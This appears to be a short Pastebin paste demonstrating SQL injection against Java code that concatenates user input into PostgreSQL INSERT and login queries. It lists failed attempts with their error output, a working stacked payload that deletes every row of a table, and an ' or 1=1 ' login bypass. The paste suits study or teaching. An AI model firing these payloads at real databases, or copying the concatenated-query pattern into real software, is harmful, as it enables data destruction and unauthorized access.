Guest User

Untitled

a guest
Jul 29th, 2018
155
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.94 KB | None | 0 0
  1. SQL injection on PostgreSQL
  2. String insert ="insert into userdetail(username,id,sno) values('"+username+"','"+userid+"','"+no+"')";
  3. Statement stmt = conn.createStatement();
  4. stmt.executeUpdate(insert);
  5.  
  6. ');DELETE FROM userdetail;
  7.  
  8. org.postgresql.util.PSQLException: ERROR: unterminat
  9. ed quoted string at or near "');"
  10. Position: 1
  11.  
  12. ','',');DELETE FROM userdetail;
  13.  
  14. 17:36:46,828 INFO [STDOUT] org.postgresql.util.PSQLException: ERROR: unterminat
  15. ed quoted string at or near "''');"
  16. Position: 38
  17.  
  18. foo', '42', '42'); delete from userdetail; --
  19.  
  20. insert into userdetail(username,id,sno) values('foo', '42', '42');
  21. delete from userdetail;
  22. -- ','21','21')
  23.  
  24. String sql = "SELECT count(*) FROM users WHERE username = '";
  25. sql += username;
  26. sql += "' AND password = '";
  27. sql += pwd;
  28. sql += "'"
  29.  
  30. ' or 1=1 or '' = '
  31.  
  32. SELECT count(*) FROM users WHERE username = 'arthur'
  33. AND password = '' or 1=1 or ''=''
Add Comment
Please, Sign In to add comment